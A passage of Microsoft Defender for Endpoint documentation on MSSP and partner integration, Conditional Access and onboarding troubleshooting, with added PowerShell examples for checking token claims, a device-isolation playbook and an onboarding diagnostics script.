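    ConvertFrom-Base64Url $parts[1] | ConvertFrom-Json
}

function Test-MsspAccessToken {
    # Returns the problems found; nothing returned means the claims match expectations.
    # This inspects claims only. The signature is verified by the resource, not here.
    param(
        [Parameter(Mandatory)][string]$Token,
        [Parameter(Mandatory)][string]$ExpectedTenantId,
        [Parameter(Mandatory)][string]$ExpectedClientId,
        [Parameter(Mandatory)][string]$ExpectedResource
    )
    $claims = Get-JwtClaims $Token
    $problems = @()
    if ($claims.tid -ne $ExpectedTenantId) { $problems += "tid is '$($claims.tid)', expected customer tenant '$ExpectedTenantId'" }
    if ($claims.appid -ne $ExpectedClientId) { $problems += "appid is '$($claims.appid)', expected your MSSP app '$ExpectedClientId'" }
    if ($claims.aud -ne $ExpectedResource) { $problems += "aud is '$($claims.aud)', expected '$ExpectedResource'" }
    $expires = [DateTimeOffset]::FromUnixTimeSeconds([int64]$claims.exp)
    if ($expires -lt [DateTimeOffset]::UtcNow) { $problems += "token expired at $($expires.ToString('u'))" }
    return $problems
}

# --- Demo on a constructed, unsigned token (sample IDs only, not a real credential) ---
function New-DemoJwt {
    param([hashtable]$Payload)
    $enc = { param($o) [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes(($o | ConvertTo-Json -Compress))).TrimEnd('=').Replace('+', '-').Replace('/', '_') }
    "$(& $enc @{ alg = 'none'; typ = 'JWT' }).$(& $enc $Payload).signature-omitted"
}

$tenant   = '11111111-2222-3333-4444-555555555555'   # hypothetical customer tenant ID
$clientId = 'aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee'   # hypothetical MSSP app (client) ID
$resource = 'https://graph.windows.net'              # the $resourceId used by MsspTokensAcquisition.ps1

$good = New-DemoJwt @{ tid = $tenant; appid = $clientId; aud = $resource; exp = [DateTimeOffset]::UtcNow.AddHours(1).ToUnixTimeSeconds() }
$bad  = New-DemoJwt @{ tid = 'ffffffff-0000-0000-0000-000000000000'; appid = $clientId; aud = 'https://example.invalid'; exp = 0 }

"good token: $(@(Test-MsspAccessToken $good $tenant $clientId $resource).Count) problem(s)"   # 0
foreach ($p in Test-MsspAccessToken $bad $tenant $clientId $resource) { "bad token: $p" }       # tid, aud, expiry
```

To use it on a real token, pass the access token printed by the script as $Token and the IDs from Step 1 as the expected values. A clean result means the token was minted for the right tenant, app and resource; it says nothing about the signature, which the resource checks when the token is presented.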

Step 3: Allow your application on Microsoft Defender XDR
You'll need to allow the application you created in Microsoft Defender XDR.

You'll need to have Manage portal system settings permission to allow the application.
Otherwise, you'll need to request your customer to allow the application for you.

1. Go to https://security.microsoft.com?tid=<customer_tenant_id> (replace
<customer_tenant_id> with the customer's tenant ID).

2. Click Settings > Endpoints > APIs > SIEM.

3. Select the MSSP tab.

4. Enter the Application ID from the first step and your Tenant ID.

5. Click Authorize application.

You can now download the relevant configuration file for your SIEM and connect to the
Microsoft Defender XDR API. For more information, see Pull alerts to your SIEM tools.
In the ArcSight configuration file / Splunk Authentication Properties file, write your
application key manually by setting the secret value.
Instead of acquiring a refresh token in the portal, use the script from the previous
step to acquire a refresh token (or acquire it by other means).

Fetch alerts from MSSP customer's tenant using APIs
For information on how to fetch alerts using REST API, see Fetch alerts from MSSP
customer tenant.

See also
Grant MSSP access to the portal
Access the MSSP customer portal
Configure alert notifications

 Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community .



Managed security service provider
partnership opportunities
Article • 07/18/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

Security is recognized as a key component in running an enterprise. However, some
organizations might not have the capacity or expertise to run a dedicated security
operations team to manage the security of their endpoints and network, and others may
want a second set of eyes to review alerts in their network.

To address this demand, managed security service providers (MSSP) offer to deliver
managed detection and response (MDR) services on top of Defender for Endpoint.

Defender for Endpoint adds partnership opportunities for this scenario and allows
MSSPs to take the following actions:

Get access to MSSP customer's Microsoft Defender portal
Get email notifications, and
Fetch alerts through security information and event management (SIEM) tools

Related topic
Configure managed security service provider integration


Microsoft Defender for Endpoint
partner opportunities and scenarios
Article • 02/22/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

Partners can extend their existing security offerings on top of the open framework
and a rich, complete set of APIs to build extensions and integrations with Defender
for Endpoint.

The APIs span functional areas including detection, management, response,
vulnerabilities, and intelligence, covering a wide range of use cases. Based on the use
case and need, partners can either stream or query data from Defender for Endpoint.

Scenario 1: External alert correlation and automated investigation and remediation
Defender for Endpoint offers unique automated investigation and remediation
capabilities to drive incident response at scale.

Integrating the automated investigation and response capability with other solutions
such as network security products or other endpoint security products helps to address
alerts. The integration also minimizes the complexities surrounding network and device
signal correlation, effectively streamlining the investigation and threat remediation
actions on devices.

Defender for Endpoint adds support for this scenario in the following forms:

External alerts can be pushed into Defender for Endpoint and presented side by
side with additional device-based alerts from Defender for Endpoint. This view
provides the full context of the alert - with the real process and the full story of
attack.
Once an alert is generated, the signal is shared across all Defender for Endpoint
protected endpoints in the enterprise. Defender for Endpoint takes immediate
automated or operator-assisted response to address the alert.

Scenario 2: Security orchestration, automation, and response (SOAR) integration
Orchestration solutions can help build playbooks and integrate the rich data model and
actions that Defender for Endpoint APIs expose to orchestrate responses, such as query
for device data, trigger device isolation, block/allow, resolve alert, and others.

Scenario 3: Indicators matching
Indicator of compromise (IoC) matching is an essential feature in every endpoint
protection solution. This capability is available in Defender for Endpoint and gives the
ability to set a list of indicators for prevention, detection, and exclusion of entities. One
can define the action to be taken as well as the duration for when to apply the action.

The above scenarios serve as examples of the extensibility of the platform. You aren't
limited to the examples and we certainly encourage you to use the open framework to
discover and explore other scenarios.

Follow the steps in Become a Microsoft Defender for Endpoint partner to integrate your
solution in Defender for Endpoint.

Related article
Overview of management and APIs
Become a Microsoft Defender for
Endpoint partner
Article • 02/21/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

To become a Defender for Endpoint solution partner, complete steps outlined in this
article.

Step 1: Subscribe to a Microsoft Defender for Endpoint license
Want to experience Defender for Endpoint? Sign up for a free trial. Subscribing allows
you to use a Microsoft Defender for Endpoint tenant with up to three devices to
develop solutions that integrate with Microsoft Defender for Endpoint.

Step 2: Fulfill the solution validation and certification requirements
The best way for technology partners to certify that their integration works is to have a
joint customer approve the suggested integration design in the Partner Application
page in Microsoft Defender XDR and have it tested and demoed to the Microsoft
Defender for Endpoint team.

Once the Microsoft Defender for Endpoint team reviews and approves the integration,
we direct you to be included as a partner at the Microsoft Intelligent Security
Association.

Step 3: Get listed in the Microsoft Defender for Endpoint partner application portal
Microsoft Defender for Endpoint supports non-Microsoft applications discovery and
integration using the in-product partner page that is embedded within the Microsoft
Defender for Endpoint management portal.

To have your company listed as a partner in the in-product partner page, provide the
following information:

A square logo (SVG)

Name of the product to be presented

A 15-word product description

A link to the landing page for the customer to complete the integration or blog
post that includes sufficient information for customers. Any press release including
the Microsoft Defender for Endpoint product name should be reviewed by the
marketing and engineering teams. Wait for at least 10 days for the review process
to be done.

If you use a multi-tenant Microsoft Entra ID approach, we need the Microsoft Entra
application name to track usage of the application.

The User-Agent field in each API call to the Defender for Endpoint public set of
APIs or Graph Security APIs. This is used for statistical purposes, troubleshooting,
and partner recognition. In addition, this step is a requirement for membership in
Microsoft Intelligent Security Association (MISA).

Follow these steps:

Set the User-Agent field in each HTTP request header to the below format.

HTTP

MdePartner-{CompanyName}-{ProductName}/{Version}

For example:

HTTP

User-Agent: MdePartner-Contoso-ContosoCognito/1.0.0

For more information, see RFC 2616, section 14.43.
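As an added illustration of both Scenario 2 in the previous article (a SOAR playbook driving response through the Defender for Endpoint API) and the User-Agent requirement above, here is a small PowerShell playbook. It's example code, not part of this documentation or of any partner's product. Get-MdeAppToken and Invoke-IsolationPlaybook are hypothetical names; the token endpoint, the machineactions, isolate and alerts API paths and the fields they accept are those of the public Defender for Endpoint API; the playbook policy (isolate only open High alerts), the alert objects and the machine action ID in the demo are constructed. The -Invoke scriptblock is the only HTTP seam, so the demo runs offline against a recording stub and shows every call carrying the partner User-Agent.

```powershell
# Added example (not the article's own code): a minimal SOAR-style playbook for the
# "alert -> isolate device -> annotate alert" pattern on the Defender for Endpoint API.
# Endpoint paths and body fields are the public API's; names and demo data are made up.

$script:ApiBase   = 'https://api.securitycenter.microsoft.com'
$script:UserAgent = 'MdePartner-Contoso-ContosoCognito/1.0.0'   # partner User-Agent format from this article

# Real transport. Token requests send a form body; API calls send JSON.
$script:DefaultInvoke = {
    param($Method, $Uri, $Headers, $Body)
    if ($Body -is [string]) {
        Invoke-RestMethod -Method $Method -Uri $Uri -Headers $Headers -Body $Body -ContentType 'application/json'
    } else {
        Invoke-RestMethod -Method $Method -Uri $Uri -Headers $Headers -Body $Body
    }
}

function Get-MdeAppToken {
    # Client-credentials grant; the app registration needs Machine.Read.All, Machine.Isolate and
    # Alert.ReadWrite.All application permissions, consented in the customer tenant.
    param([string]$TenantId, [string]$ClientId, [string]$ClientSecret, [scriptblock]$Invoke = $script:DefaultInvoke)
    $form = @{ grant_type = 'client_credentials'; client_id = $ClientId; client_secret = $ClientSecret; resource = $script:ApiBase }
    (& $Invoke 'POST' "https://login.microsoftonline.com/$TenantId/oauth2/token" @{ 'User-Agent' = $script:UserAgent } $form).access_token
}

function Invoke-IsolationPlaybook {
    param(
        [Parameter(Mandatory)]$Alert,                 # alert object as returned by GET /api/alerts/{id}
        [Parameter(Mandatory)][string]$Token,
        [string]$Operator = 'soar-playbook',
        [scriptblock]$Invoke = $script:DefaultInvoke
    )
    $headers = @{ Authorization = "Bearer $Token"; 'User-Agent' = $script:UserAgent }
    $base = $script:ApiBase

    # Playbook policy (hypothetical): act only on open High alerts; leave the rest to the analyst.
    if ($Alert.severity -ne 'High' -or $Alert.status -eq 'Resolved') {
        return [pscustomobject]@{ alertId = $Alert.id; action = 'none'; reason = "severity=$($Alert.severity), status=$($Alert.status)" }
    }

    # Idempotency: an Isolate action that is pending, running or already done means nothing to do.
    $filter = [uri]::EscapeDataString("machineId eq '$($Alert.machineId)' and type eq 'Isolate'")
    $existing = @((& $Invoke 'GET' "$base/api/machineactions?`$filter=$filter" $headers $null).value |
        Where-Object { $_.status -in 'Pending', 'InProgress', 'Succeeded' })
    if ($existing.Count -gt 0) {
        return [pscustomobject]@{ alertId = $Alert.id; action = 'none'; reason = "isolation already $($existing[0].status)" }
    }

    # Selective isolation still allows Outlook, Teams and Skype for Business; 'Full' blocks those too.
    # Either type keeps the sensor's own channel to the service open.
    $isolate = @{ Comment = "Auto-isolated by $Operator for alert $($Alert.id): $($Alert.title)"; IsolationType = 'Selective' } | ConvertTo-Json -Compress
    $action = & $Invoke 'POST' "$base/api/machines/$($Alert.machineId)/isolate" $headers $isolate

    # Leave a trail on the alert so the SOC can see the playbook acted.
    $update = @{ status = 'InProgress'; assignedTo = $Operator; comment = "Device isolation requested (machine action $($action.id))" } | ConvertTo-Json -Compress
    $null = & $Invoke 'PATCH' "$base/api/alerts/$($Alert.id)" $headers $update

    [pscustomobject]@{ alertId = $Alert.id; action = 'isolate'; machineActionId = $action.id; status = $action.status }
}

# ---- Offline demo: a recording stub stands in for the API (constructed sample data) ----
$calls = [System.Collections.Generic.List[string]]::new()
$stub = {
    param($Method, $Uri, $Headers, $Body)
    $calls.Add("$Method $Uri  [User-Agent: $($Headers['User-Agent'])]")
    switch -Wildcard ($Uri) {
        '*/api/machineactions*' { return @{ value = @() } }                                   # no isolation yet
        '*/isolate'             { return @{ id = 'ma-0001'; type = 'Isolate'; status = 'Pending' } }
        default                 { return @{} }
    }
}
$highAlert = [pscustomobject]@{ id = 'da-sample-1'; title = 'Suspicious PowerShell download'; severity = 'High'; status = 'New'; machineId = 'sample-machine-id' }
$lowAlert  = [pscustomobject]@{ id = 'da-sample-2'; title = 'Informational event';            severity = 'Low';  status = 'New'; machineId = 'sample-machine-id' }

Invoke-IsolationPlaybook -Alert $highAlert -Token 'demo-token' -Invoke $stub   # action = isolate, machineActionId = ma-0001
Invoke-IsolationPlaybook -Alert $lowAlert  -Token 'demo-token' -Invoke $stub   # action = none
$calls   # GET machineactions, POST isolate, PATCH alert, each tagged with the partner User-Agent
```

To run it against a tenant, drop the -Invoke $stub argument (the default transport is used) and pass a token from Get-MdeAppToken. The idempotency check matters in a SOAR context because the same alert is often delivered more than once; without it every redelivery would queue another isolation action.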

Partnerships with Microsoft Defender for Endpoint help our mutual customers to further
streamline, integrate, and orchestrate defenses. Thank you for choosing to become a
Microsoft Defender for Endpoint partner and to achieve our common goal of effectively
protecting customers and their assets by preventing and responding to modern threats
together.

MISA nomination
Managed security service providers (MSSP) and independent software vendors (ISV) can
be nominated to the Microsoft Intelligent Security Association (MISA). For more
information, see MISA information page .

Related articles
Technical partner opportunities


Microsoft Defender for Endpoint and
other Microsoft solutions
Article • 11/15/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Integrate with other Microsoft solutions
Microsoft Defender for Endpoint directly integrates with various Microsoft solutions.

Microsoft Defender for Cloud
Microsoft Defender for Cloud provides a comprehensive server protection solution,
including endpoint detection and response (EDR) capabilities on Windows Servers.

Microsoft Sentinel
The Microsoft Defender for Endpoint connector lets you stream alerts from Microsoft
Defender for Endpoint into Microsoft Sentinel. This will enable you to more
comprehensively analyze security events across your organization and build playbooks
for effective and immediate response.

Azure Information Protection
The Azure Information Protection integration was recently deprecated because the
Endpoint DLP capabilities incorporate an improved discovery and protection solution for
sensitive data stored on endpoint devices, with greater visibility and integration
between solutions. This was announced in the following blog. We recommend that
customers move to using Endpoint DLP.

Conditional Access
Microsoft Defender for Endpoint's dynamic device risk score is integrated into the
Conditional Access evaluation, ensuring that only secure devices have access to
resources.

Microsoft Defender for Cloud Apps
Microsoft Defender for Cloud Apps leverages Microsoft Defender for Endpoint signals to
allow direct visibility into cloud application usage including the use of unsupported
cloud services (shadow IT) from all Microsoft Defender for Endpoint monitored devices.

Microsoft Defender for Identity
Suspicious activities are processes running under a user context. The integration
between Microsoft Defender for Endpoint and Microsoft Defender for Identity provides
the flexibility of conducting cyber security investigation across activities and identities.

Microsoft Defender for Office 365
Defender for Office 365 helps protect your organization from malware in email
messages or files through Safe Links, Safe Attachments, advanced Anti-Phishing, and
spoof intelligence capabilities. The integration between Microsoft Defender for Office
365 and Microsoft Defender for Endpoint enables security analysts to go upstream to
investigate the entry point of an attack. Through threat intelligence sharing, attacks can
be contained and blocked.

Note

Defender for Office 365 data is displayed for events within the last 30 days. For
alerts, Defender for Office 365 data is displayed based on first activity time. After
that, the data is no longer available in Defender for Office 365.

Skype for Business
The Skype for Business integration provides a way for analysts to communicate with a
potentially compromised user or device owner through a simple button from the portal.

Microsoft Defender XDR
Microsoft Defender XDR, Microsoft Defender for Endpoint, and various Microsoft
security solutions form a unified pre- and post-breach enterprise defense suite that
natively integrates across endpoint, identity, email, and applications to detect, prevent,
investigate, and automatically respond to sophisticated attacks.

Learn more about Microsoft Defender XDR

Related topics
Configure integration and other advanced features
Microsoft Defender XDR overview
Turn on Microsoft Defender XDR
Protect users, data, and devices with Conditional Access


Enable Conditional Access to better
protect users, devices, and data
Article • 10/20/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

Conditional Access is a capability that helps you better protect your users and enterprise
information by making sure that only secure devices have access to applications.
https://www.microsoft.com/en-us/videoplayer/embed/RE4byD1?postJsllMsg=true

With Conditional Access, you can control access to enterprise information based on the
risk level of a device. This helps keep trusted users on trusted devices using trusted
applications.

You can define security conditions under which devices and applications can run and
access information from your network by enforcing policies to stop applications from
running until a device returns to a compliant state.

The implementation of Conditional Access in Defender for Endpoint is based on
Microsoft Intune (Intune) device compliance policies and Microsoft Entra Conditional
Access policies.

The compliance policy is used with Conditional Access to allow only devices that fulfill
one or more device compliance policy rules to access applications.

Understand the Conditional Access flow
Conditional Access is put in place so that when a threat is seen on a device, access to
sensitive content is blocked until the threat is remediated.

The flow begins with devices being seen to have a low, medium, or high risk. These risk
determinations are then sent to Intune.

Depending on how you configure policies in Intune, Conditional Access can be set up so
that when certain conditions are met, the policy is applied.
For example, you can configure Intune to apply Conditional Access on devices that have
a high risk.

In Intune, a device compliance policy is used with Microsoft Entra Conditional Access to
block access to applications. In parallel, an automated investigation and remediation
process is launched.

A user can still use the device while the automated investigation and remediation is
taking place, but access to enterprise data is blocked until the threat is fully remediated.

To resolve the risk found on a device, you need to return the device to a compliant state.
A device returns to a compliant state when there's no risk seen on it.

There are three ways to address a risk:

1. Use manual or automated remediation.
2. Resolve active alerts on the device. This removes the risk from the device.
3. Remove the device from the active policies; Conditional Access then won't be
applied on the device.

Manual remediation requires a secops admin to investigate an alert and address the risk
seen on the device. The automated remediation is configured through configuration
settings provided in the following section, Configure Conditional Access.

When the risk is removed either through manual or automated remediation, the device
returns to a compliant state and access to applications is granted.

The following example sequence of events explains Conditional Access in action:

1. A user opens a malicious file and Defender for Endpoint flags the device as high
risk.
2. The high risk assessment is passed along to Intune. In parallel, an automated
investigation is initiated to remediate the identified threat. A manual remediation
can also be done to remediate the identified threat.
3. Based on the policy created in Intune, the device is marked as not compliant. The
assessment is then communicated to Microsoft Entra ID by the Intune Conditional
Access policy. In Microsoft Entra ID, the corresponding policy is applied to block
access to applications.
4. The manual or automated investigation and remediation is completed and the
threat is removed. Defender for Endpoint sees that there's no risk on the device
and Intune assesses the device to be in a compliant state. Microsoft Entra ID
applies the policy, which allows access to applications.
5. Users can now access applications.
Related topic
Configure Conditional Access in Microsoft Defender for Endpoint


Microsoft Defender for Cloud Apps in
Defender for Endpoint overview
Article • 11/15/2023

Important

Some information in this article relates to prereleased product which may be
substantially modified before it's commercially released. Microsoft makes no
warranties, express or implied, with respect to the information provided here.

Applies to:

Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Microsoft Defender for Cloud Apps is a comprehensive solution that gives visibility into
cloud apps and services by allowing you to control and limit access to cloud apps, while
enforcing compliance requirements on data stored in the cloud. For more information,
see Defender for Cloud Apps.

Note

This feature is available with an E5 license for Enterprise Mobility + Security on
devices running Windows 10 version 1809 or later, or Windows 11.

Microsoft Defender for Endpoint and Defender for Cloud Apps integration
Defender for Cloud Apps discovery relies on cloud traffic logs being forwarded to it
from enterprise firewall and proxy servers. Microsoft Defender for Endpoint integrates
with Defender for Cloud Apps by collecting and forwarding all cloud app networking
activities, providing unparalleled visibility to cloud app usage. The monitoring
functionality is built into the device, providing complete coverage of network activity.
https://www.microsoft.com/en-us/videoplayer/embed/RE4r4yQ?postJsllMsg=true
The integration provides the following major improvements to the existing Defender for
Cloud Apps discovery:

Available everywhere - Since the network activity is collected directly from the
endpoint, it's available wherever the device is, on or off the corporate network, as it
no longer depends on traffic routed through the enterprise firewall or proxy
servers.

Works out of the box, no configuration required - Forwarding cloud traffic logs to
Defender for Cloud Apps requires firewall and proxy server configuration. With the
Defender for Endpoint and Defender for Cloud Apps integration, there's no
configuration required. Just switch it on in Microsoft Defender XDR settings and
you're good to go.

Device context - Cloud traffic logs lack device context. Defender for Endpoint
network activity is reported with the device context (which device accessed the
cloud app), so you are able to understand exactly where (device) the network
activity took place, in addition to who (user) performed it.

For more information about cloud discovery, see Working with discovered apps.

Related topic
Configure Microsoft Defender for Cloud Apps integration


Troubleshoot Microsoft Defender for Endpoint
onboarding issues
Article • 06/14/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Windows Server 2012 R2
Windows Server 2016
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

You might need to troubleshoot the Microsoft Defender for Endpoint onboarding process if you
encounter issues. This page provides detailed steps to troubleshoot onboarding issues that might occur
when deploying with one of the deployment tools and common errors that might occur on the devices.

Before you start troubleshooting issues with onboarding tools, it's important to check if the minimum
requirements are met for onboarding devices to the services. Learn about the licensing, hardware, and
software requirements to onboard devices to the service.

Troubleshoot issues with onboarding tools
If you've completed the onboarding process and don't see devices in the Devices list after an hour, it
might indicate an onboarding or connectivity problem.

Troubleshoot onboarding when deploying with Group Policy
Deployment with Group Policy is done by running the onboarding script on the devices. The Group
Policy console doesn't indicate if the deployment has succeeded or not.

If you've completed the onboarding process and don't see devices in the Devices list after an hour, you
can check the output of the script on the devices. For more information, see Troubleshoot onboarding
when deploying with a script.

If the script completes successfully, see Troubleshoot onboarding issues on the devices for additional
errors that might occur.

Troubleshoot onboarding issues when deploying with Microsoft Endpoint Configuration Manager
When onboarding devices using the following versions of Configuration Manager:

Microsoft Endpoint Configuration Manager
System Center 2012 Configuration Manager
System Center 2012 R2 Configuration Manager

Deployment with the above-mentioned versions of Configuration Manager is done by running the
onboarding script on the devices. You can track the deployment in the Configuration Manager Console.

If the deployment fails, you can check the output of the script on the devices.

If the onboarding completed successfully but the devices aren't showing up in the Devices list after an
hour, see Troubleshoot onboarding issues on the device for additional errors that might occur.

Troubleshoot onboarding when deploying with a script
Check the result of the script on the device:

1. Click Start, type Event Viewer, and press Enter.

2. Go to Windows Logs > Application.

3. Look for an event from WDATPOnboarding event source.

If the script fails and the event is an error, you can check the event ID in the following table to help you
troubleshoot the issue.

Note

The following event IDs are specific to the onboarding script only.

Event ID 5: Offboarding data was found but couldn't be deleted.
Resolution steps: Check the permissions on the registry, specifically
HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection.

Event ID 10: Onboarding data couldn't be written to registry.
Resolution steps: Check the permissions on the registry, specifically
HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection. Verify that the script has been
run as an administrator.

Event ID 15: Failed to start SENSE service.
Resolution steps: Check the service health (sc query sense command). Make sure it's not in an
intermediate state ('Pending_Stopped', 'Pending_Running') and try to run the script again (with
administrator rights).
If the device is running Windows 10, version 1607 and running the command sc query sense returns
START_PENDING, reboot the device. If rebooting the device doesn't address the issue, upgrade to
KB4015217 and try onboarding again.

Event ID 15: Failed to start SENSE service.
Resolution steps: If the message of the error is: System error 577 or error 1058 has occurred, you
need to enable the Microsoft Defender Antivirus ELAM driver, see Ensure that Microsoft Defender
Antivirus is not disabled by a policy for instructions.

Event ID 30: The script failed to wait for the service to start running.
Resolution steps: The service could have taken more time to start or has encountered errors while
trying to start. For more information on events and errors related to SENSE, see Review events and
errors using Event viewer.

Event ID 35: The script failed to find needed onboarding status registry value.
Resolution steps: When the SENSE service starts for the first time, it writes onboarding status to the
registry location HKLM\SOFTWARE\Microsoft\Windows Advanced Threat Protection\Status. The script
failed to find it after several seconds. You can manually test it and check if it's there. For more
information on events and errors related to SENSE, see Review events and errors using Event viewer.

Event ID 40: SENSE service onboarding status isn't set to 1.
Resolution steps: The SENSE service has failed to onboard properly. For more information on events
and errors related to SENSE, see Review events and errors using Event viewer.

Event ID 65: Insufficient privileges.
Resolution steps: Run the script again with administrator privileges.

Event ID 70: Offboarding script is for a different organization.
Resolution steps: Get an offboarding script for the correct organization that the SENSE service is
onboarded to.
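The checks behind the table above (SENSE service state, the onboarding status registry value, the WDATPOnboarding events in the Application log), together with the SENSE Operational log and the MDM Admin log that the later sections of this article walk through in Event Viewer, can be gathered by one script. The following PowerShell is an added example, not part of the article: Get-OnboardingFacts and Get-OnboardingFindings are hypothetical names; the registry paths, service name and event IDs are the ones this article cites; the event channel names are the full names Get-WinEvent -ListLog reports for those Event Viewer folders; and the sample fact set at the end is constructed so the evaluator can be tried on a machine that isn't onboarded.

```powershell
# Added example (not part of the article): collect the onboarding facts the article tells you to
# check by hand and turn them into findings. Get-OnboardingFacts must run elevated on the Windows
# device; Get-OnboardingFindings is pure, so the demo feeds it a constructed fact set.

$PolicyKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection'
$StatusKey = 'HKLM:\SOFTWARE\Microsoft\Windows Advanced Threat Protection\Status'

function Get-OnboardingFacts {
    $sense  = Get-Service -Name Sense -ErrorAction SilentlyContinue
    $status = Get-ItemProperty -Path $StatusKey -ErrorAction SilentlyContinue
    $recent = @{ MaxEvents = 20; ErrorAction = 'SilentlyContinue' }
    $senseStatus    = if ($sense) { $sense.Status.ToString() } else { 'NotInstalled' }
    $senseStartType = if ($sense) { $sense.StartType.ToString() } else { $null }
    [pscustomobject]@{
        SenseStatus     = $senseStatus
        SenseStartType  = $senseStartType
        PolicyKeyExists = Test-Path $PolicyKey
        OnboardingState = $status.OnboardingState     # written by SENSE on first start; 1 means onboarded
        # Onboarding script results: Application log, source WDATPOnboarding
        ScriptEvents    = @(Get-WinEvent @recent -FilterHashtable @{ LogName = 'Application'; ProviderName = 'WDATPOnboarding' } |
                            Select-Object Id, LevelDisplayName, TimeCreated, Message)
        # Sensor errors: Applications and Services Logs > Microsoft > Windows > SENSE > Operational (Critical/Error/Warning)
        SenseErrors     = @(Get-WinEvent @recent -FilterHashtable @{ LogName = 'Microsoft-Windows-SENSE/Operational'; Level = 1, 2, 3 } |
                            Select-Object Id, LevelDisplayName, TimeCreated, Message)
        # MDM client errors (DeviceManagement-Enterprise-Diagnostics-Provider, Admin channel), e.g. event 1819
        MdmErrors       = @(Get-WinEvent @recent -FilterHashtable @{ LogName = 'Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Admin'; Level = 2 } |
                            Select-Object Id, TimeCreated, Message)
    }
}

function Get-OnboardingFindings {
    param([Parameter(Mandatory)]$Facts)
    $out = [System.Collections.Generic.List[string]]::new()
    switch ($Facts.SenseStatus) {
        'NotInstalled' { $out.Add('SENSE service is not present: unsupported OS build, or the sensor is not installed.') }
        'Running'      { }
        { $_ -in 'StartPending', 'StopPending' } { $out.Add("SENSE is $_ (an intermediate state): wait or reboot, then rerun the onboarding script (script event 15).") }
        default        { $out.Add("SENSE is $_: review the SENSE Operational log before rerunning onboarding.") }
    }
    if (-not $Facts.PolicyKeyExists) { $out.Add('Policy registry key is missing: MDM/Intune onboarding cannot write to it (Remediation failed on the Onboarding OMA-URI).') }
    if ($null -eq $Facts.OnboardingState) { $out.Add('OnboardingState was never written: SENSE has not completed a first start (script event 35).') }
    elseif ($Facts.OnboardingState -ne 1) { $out.Add("OnboardingState is $($Facts.OnboardingState), expected 1 (script event 40).") }

    # Hints keyed by the onboarding-script event IDs in the table above
    $scriptHints = @{ 5 = 'registry permissions'; 10 = 'registry permissions / run as administrator'; 15 = 'service failed to start'
                      30 = 'service start timed out'; 35 = 'status value not written'; 40 = 'onboarding status not 1'
                      65 = 'insufficient privileges'; 70 = 'script belongs to a different organization' }
    foreach ($e in @($Facts.ScriptEvents | Where-Object LevelDisplayName -eq 'Error')) {
        $hint = if ($scriptHints.ContainsKey([int]$e.Id)) { $scriptHints[[int]$e.Id] } else { 'see the onboarding script event table' }
        $out.Add("Onboarding script event $($e.Id) ($hint): $($e.Message)")
    }
    # Hints keyed by the SENSE Operational event IDs in the device event log table
    foreach ($e in @($Facts.SenseErrors)) {
        $hint = 'see the SENSE event table'
        if ($e.Id -in 5, 7, 15) { $hint = 'check Internet access / proxy' }
        elseif ($e.Id -in 6, 9, 10, 17) { $hint = 'rerun the onboarding script' }
        elseif ($e.Id -in 25, 27, 30) { $hint = 'contact support' }
        $out.Add("SENSE event $($e.Id) ($hint): $($e.Message)")
    }
    foreach ($e in @($Facts.MdmErrors)) { $out.Add("MDM event $($e.Id): $($e.Message)") }
    $out.ToArray()
}

# Demo: a constructed fact set for a device where the script ran but the sensor never checked in
$sample = [pscustomobject]@{
    SenseStatus = 'Running'; SenseStartType = 'Automatic'; PolicyKeyExists = $true; OnboardingState = 0
    ScriptEvents = @([pscustomobject]@{ Id = 40; LevelDisplayName = 'Error'; TimeCreated = (Get-Date); Message = 'SENSE service onboarding status is not set to 1' })
    SenseErrors  = @([pscustomobject]@{ Id = 5;  LevelDisplayName = 'Error'; TimeCreated = (Get-Date); Message = 'Microsoft Defender for Endpoint service failed to connect to the server' })
    MdmErrors    = @()
}
Get-OnboardingFindings $sample     # OnboardingState 0, script event 40, SENSE event 5 (connectivity)

# On the device itself, from an elevated prompt:
# Get-OnboardingFindings (Get-OnboardingFacts)
```

The split between collection and evaluation is deliberate: the collector is the only part that needs administrator rights and a real SENSE installation, so the evaluation logic can be reviewed and tried anywhere, and the same findings function can be pointed at facts exported from a device you can't log on to interactively.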

Troubleshoot onboarding issues using Microsoft Intune
You can use Microsoft Intune to check error codes and attempt to troubleshoot the cause of the issue.

If you have configured policies in Intune and they aren't propagated on devices, you might need to
configure automatic MDM enrollment.

Use the following tables to understand the possible causes of issues while onboarding:

Microsoft Intune error codes and OMA-URIs table
Known issues with non-compliance table
Mobile Device Management (MDM) event logs table

If none of the event logs and troubleshooting steps work, download the Local script from the Device
management section of the portal, and run it in an elevated command prompt.

Microsoft Intune error codes and OMA-URIs

Error code 0x87D1FDE8 (decimal -2016281112), Remediation failed. OMA-URI: Onboarding, Offboarding.
Possible cause: Onboarding or offboarding failed on a wrong blob: wrong signature or missing
PreviousOrgIds fields.
Troubleshooting steps:
Check the event IDs in the View agent onboarding errors in the device event log section.
Check the MDM event logs in the following table or follow the instructions in Diagnose MDM failures in
Windows.

Error code 0x87D1FDE8 (decimal -2016281112), Remediation failed. OMA-URI: Onboarding, Offboarding,
SampleSharing.
Possible cause: Microsoft Defender for Endpoint Policy registry key doesn't exist or the OMA DM client
doesn't have permissions to write to it.
